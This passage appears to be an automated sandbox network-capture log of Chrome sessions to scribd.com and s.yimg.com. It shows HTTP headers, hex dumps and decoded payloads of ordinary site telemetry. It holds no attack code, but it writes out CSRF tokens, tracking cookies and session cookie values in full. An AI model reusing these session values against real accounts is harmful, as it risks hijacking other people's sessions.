                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        37192.168.2.1649758151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC2829OUTPOST /doc-page/personalization HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 397
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                                                                                                                                                                        X-CSRF-Token: rn8ulBMOdE7x_iiXgOz-MmcrYP5oEc14Ua9-qGV95JOVUo69AQjG5lb5W0ba6CBsLD6dOMkSYGxzMLrvEnUfzA
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/document/801519291/Advice-Notification
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC397OUTData Raw: 7b 22 70 65 72 73 6f 6e 61 6c 69 7a 61 74 69 6f 6e 44 61 74 61 22 3a 7b 22 61 76 61 69 6c 5f 68 65 69 67 68 74 22 3a 39 38 34 2c 22 61 76 61 69 6c 5f 77 69 64 74 68 22 3a 31 32 38 30 2c 22 63 6f 6c 6f 72 5f 64 65 70 74 68 22 3a 32 34 2c 22 63 6f 6f 6b 69 65 5f 75 75 69 64 22 3a 22 65 31 31 34 32 36 33 35 2d 37 35 39 61 2d 34 34 66 37 2d 61 63 39 62 2d 37 30 34 62 31 30 63 31 36 32 62 37 22 2c 22 63 6f 6f 6b 69 65 73 5f 65 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 68 61 72 64 77 61 72 65 5f 63 6f 6e 63 75 72 72 65 6e 63 79 22 3a 34 2c 22 68 65 69 67 68 74 22 3a 31 30 32 34 2c 22 6a 61 76 61 5f 65 6e 61 62 6c 65 64 22 3a 66 61 6c 73 65 2c 22 6c 65 66 74 22 3a 30 2c 22 6d 61 78 5f 74 6f 75 63 68 5f 70 6f 69 6e 74 73 22 3a 30 2c 22 6f 72 69 65 6e 74 61 74 69
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"personalizationData":{"avail_height":984,"avail_width":1280,"color_depth":24,"cookie_uuid":"e1142635-759a-44f7-ac9b-704b10c162b7","cookies_enabled":true,"hardware_concurrency":4,"height":1024,"java_enabled":false,"left":0,"max_touch_points":0,"orientati
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC1354INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-store
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"09dfc31e26fc7b5fe905de04f76b5f9f"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _scribd_session=UjRyUkx6ajhieWxSN3VsTXVraHhmRmZzNWNNNFd6RlFGSmFxUGFuY0djMDQ0c25mNFEyRERLQVh1ZFBBem5sUEJySlNUOHFiUlFVYjB5WGx4elZmWGNBcVdNcHBSVFh2dG81UXY5dGxNNTlpQmV6WVV1MGw0WE14aVR5ZENUK0xCMThYME5DZExaZFRlT0NUYlVVSzdhd2lzZm1RWmJML0psd2h6SEE4OFVQaEFJTGJXVkNwZ3BXNEd5cW9aTkFaOFB6L044RlJvQ0pZbnhkZnc1dElVKzJMbFZteEVVWlVPb1ZUTDJDRmlTSUlTZzU1SUNxeUhUM0Vya3o5T3RKcTd4MGhvRTJVRXZlaUJIYnFoL0tHMG5oRGNSaHBmdkYrNlhCd0JjazAwaVJpeUV1K2d5MEJBeWx0SW9ybDl2TmUtLVYzTnBsREljTzJucWNEaTA5OEtMMHc9PQ%3D%3D--6834cd9348dca4f7c7b47f4bef7032dd8ac620ae; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:27 GMT; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 62
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: ed592da905fc93d445a550997fbe1692fc8e9c3119eebd407251d36df03363b1
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.059458
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740030-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522368.737232,VS0,VE91
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC208INData Raw: 56 61 72 79 3a 20 58 2d 4c 61 6e 67 75 61 67 65 2d 4c 6f 63 61 6c 65 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Vary: X-Language-Locale,Accept-EncodingStrict-Transport-Security: max-age=63072000; includeSubDomainsalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC4INData Raw: 38 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 80
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC128INData Raw: 7b 22 63 75 72 72 65 6e 74 5f 75 73 65 72 5f 63 6f 75 6e 74 72 79 22 3a 22 55 53 22 2c 22 70 65 72 73 6f 6e 61 6c 69 7a 65 64 41 72 63 68 69 76 65 4f 66 66 65 72 22 3a 6e 75 6c 6c 2c 22 70 6c 61 6e 73 54 72 61 63 6b 69 6e 67 22 3a 5b 5d 2c 22 73 75 62 73 63 72 69 70 74 69 6f 6e 50 72 69 63 65 22 3a 22 24 31 31 2e 39 39 22 2c 22 74 72 69 61 6c 44 75 72 61 74 69 6f 6e 22 3a 33 30 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"current_user_country":"US","personalizedArchiveOffer":null,"plansTracking":[],"subscriptionPrice":"$11.99","trialDuration":30}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        38192.168.2.1649759151.101.194.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC2831OUTPOST /documents/801519291/pingback HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json
                                                                                                                                                                                                                                                                                                                                                                                        X-Requested-With: XMLHttpRequest
                                                                                                                                                                                                                                                                                                                                                                                        X-CSRF-Token: rn8ulBMOdE7x_iiXgOz-MmcrYP5oEc14Ua9-qGV95JOVUo69AQjG5lb5W0ba6CBsLD6dOMkSYGxzMLrvEnUfzA
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Origin: https://www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Referer: https://www.scribd.com/document/801519291/Advice-Notification
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC1373INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: private, no-store
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"8b0140a3702ddab9abdd6a9ef6ddb51d"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _scribd_session=ejNIM0NJQ1NlNjEzQkhJSEs2Y3JZNmpkVVVjUFZyLytkTlptaW11eFAyWGVVcUZ5ZDUyWmc1aGZLVHh4SmdadDN2WWgvNklJWU9JSEVrRmxDekplVjRVRGllaGNpWUIwMDdTczhXZnJGL1RFZVpJZkZUUGpFTC9MNWQ1V3Voa2xFRkdFbi9rWWkwNkhCM2c0bm1XaUNYNGVNUFQ2WU5UNUdvOUMzRkdVQm9SdDNTWVNqS0k2SFQ3eFZXQzZ0MEt3cG5wbVpCZG1Iek1uNERObHJqTU5YUjFhZy9RWlFSRk5USWROUzlJbjhqMjlpaldHUU1ScDhrY0NzVlA5aVVoa0hwR0EwOUVBTFU2TVBSVmpZelhJYXlsT3JRSnluZTZYc2lORTNNTDI1YTNsa3VXUER4UnRoNExYdDN2dFlRK0UtLUYwNmNoVkFjRWcwTDFtZ1hXMlJOQVE9PQ%3D%3D--51e6b57ecb0d9d7b40f08082086bfce630df5211; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:27 GMT; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 10
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: 517b027c0444b27d6d9fbc67b0322cc864db5a0bb7eb38295a71e6a244da5add
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.006851
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-ewr-kewr1740053-EWR
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522368.742595,VS0,VE54
                                                                                                                                                                                                                                                                                                                                                                                        Vary: X-Language-Locale,Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC167INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Strict-Transport-Security: max-age=63072000; includeSubDomainsalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        39192.168.2.1649760151.101.2.1524436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC2384OUTGET /csrf_token HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: www.scribd.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                        Cookie: scribd_ubtc=u%3D77eabba7-56db-4263-a995-14e083c9866b%26h%3Diejk%2BJo6XzI9RrFNqEFB%2Bbr3ZZhyUFte3fWlOGmg%2B7s%3D; osano_consentmanager_uuid=89feed45-6ae7-4319-8c64-0d02839e7716; osano_consentmanager=aXQ2i6CFyu9Ya2Fk9ae1hPJ_A1-fw0x1B_hOIQoAsIBuZhlIHC_A3_sTr7tDq4esf_tDOU-z2kkOOveE3pH_Skvf1x9kVRgn24HjyyFYOyEaLiCxeSsuo281Gqknb0KvJd3JwI6kifAGRELM58SFYbf1IsKt5Liv3nGSbycLsHUSz8ldug_rVMVBEkR7rnSACz1CxtzXVmKYTd-W8WSK_GgqdST_sRn0dUGk0hult4aO24tAJGFIKOyIcutba1UepHRMjVoibRgn8V4WmdU7MJyysuJree9mUa4ufNyQGwokGlGnbB0WCkldrzJ9XCIBAytBvM_awxHImjUGPtM454ardQVFauGTgauP6U4duNCXj2nM-OOJIWwNu40f7VK5ppywZ3_ueMRbBB_qcBmQr2UHoWbNnUSZgS6RmQVdoF7MHo3SDSfez_dzy2wNVUik19LNngI4p9qmvzrib5GRXX386JangWeGRpC6hoyrF-CyA-co2ce_Bm2Rm2Hbae5zIsoXXt8_-VFpP7M17OibOKmcKV2KkYWChyOG0la1vcAis306oDJjmDJ1iOpMYBaO-1LddLBuCWpiO2zm89d1oHYE8R1bNRtp; _gcl_au=1.1.1182281480.1733522361; _fs_sample_user=false; __CJ_nwt=%7B%22nw2868%22%3A7327%7D; __CJ_parchive_offer=%7B%22avail_height%22%3A984%2C%22avail_width%22%3A1280%2C%22color_depth%22%3A24%2C%22cookie_uu [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC1372INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: max-age=0, private, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                                        Etag: W/"f40f734824e5e8f9b971fd55fb2bc72f"
                                                                                                                                                                                                                                                                                                                                                                                        Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                                        Server: envoy
                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: _scribd_session=WDJuL3JwTU91QTA4RTFEb2hjL01LWk1PL1ZYNGkyZ2ZhTEJEZnYxY1kwT25lQ2hySmJzaEFNTDZtRjZyRm82MXIyRHl0VUhaTndrSFhnMU1nK3l6OTVNVTdWcWpDZmtiZ21tWVVhd3kzRWE0YU9xOVdqRFYyMVJoMHVUcUdHcFI3WSttWXdLTXBzQ1QwOEVvN2ZuNTZSSnFneVhVcCtTNXFCbTNMczJ0S2lCNFVMUEFnWlNya1h6d081Rk1MQXlnTGJYUktJUzNGZnhYVjRzZzFWRC9Ga2xiQnA4bGhXOHl3RXhhamJwRW9pRHpYdlBjN3JFYlhWUHNra2x4UUlxUkJSRExFVGpla2IyNUhjWTlxc25nRE05VHR4QnRSTG03SHRRZTV6OGJFQnFieWRGSGVtOWZpUkNuZW93eDBUSXAtLTl4UFJEbUYzQ3phQmFDVTVlaitoZnc9PQ%3D%3D--e7c6233893d2b6690fa7e41495a2b215ab45736d; domain=.scribd.com; path=/; expires=Mon, 06 Dec 2027 21:59:27 GMT; secure; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                                        Status: 200 OK
                                                                                                                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                        X-Download-Options: noopen
                                                                                                                                                                                                                                                                                                                                                                                        X-Envoy-Upstream-Service-Time: 4
                                                                                                                                                                                                                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                                                                                                                                                                                                                                                                                                                                        X-Request-Id: b76daf317eea0eb90363d72efbadc5d29c9806d22805e294da3a83ae52679429
                                                                                                                                                                                                                                                                                                                                                                                        X-Runtime: 0.002613
                                                                                                                                                                                                                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 06 Dec 2024 21:59:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                        Via: 1.1 varnish
                                                                                                                                                                                                                                                                                                                                                                                        X-Served-By: cache-nyc-kteb1890072-NYC
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                                                                                                                                                                                                                        X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                                                                                                                        X-Timer: S1733522368.749710,VS0,VE107
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC208INData Raw: 56 61 72 79 3a 20 58 2d 4c 61 6e 67 75 61 67 65 2d 4c 6f 63 61 6c 65 2c 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 36 33 30 37 32 30 30 30 3b 20 69 6e 63 6c 75 64 65 53 75 62 44 6f 6d 61 69 6e 73 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 2c 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 6d 61 3d 38 36 34 30 30 0d 0a 74 72 61 6e 73 66 65 72 2d 65 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: Vary: X-Language-Locale,Accept-EncodingStrict-Transport-Security: max-age=63072000; includeSubDomainsalt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC4INData Raw: 36 37 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 67
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC103INData Raw: 7b 22 63 73 72 66 5f 74 6f 6b 65 6e 22 3a 22 33 4c 30 6d 39 4f 6b 77 34 51 6f 6a 30 7a 42 32 56 54 72 59 6f 30 2d 58 4c 72 49 4f 4b 49 2d 4d 74 39 30 50 32 31 55 67 42 4e 66 6e 6b 49 62 64 2d 7a 5a 54 6f 6f 54 55 51 36 63 50 50 67 62 39 42 49 4c 54 64 4b 38 72 49 70 69 56 51 73 75 63 49 69 6a 5f 69 41 22 7d
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: {"csrf_token":"3L0m9Okw4Qoj0zB2VTrYo0-XLrIOKI-Mt90P21UgBNfnkIbd-zZTooTUQ6cPPgb9BILTdK8rIpiVQsucIij_iA"}
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:28 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                        40192.168.2.1649757188.125.88.2064436304C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                        2024-12-06 21:59:27 UTC343OUTGET /wi/ytc.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                        Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
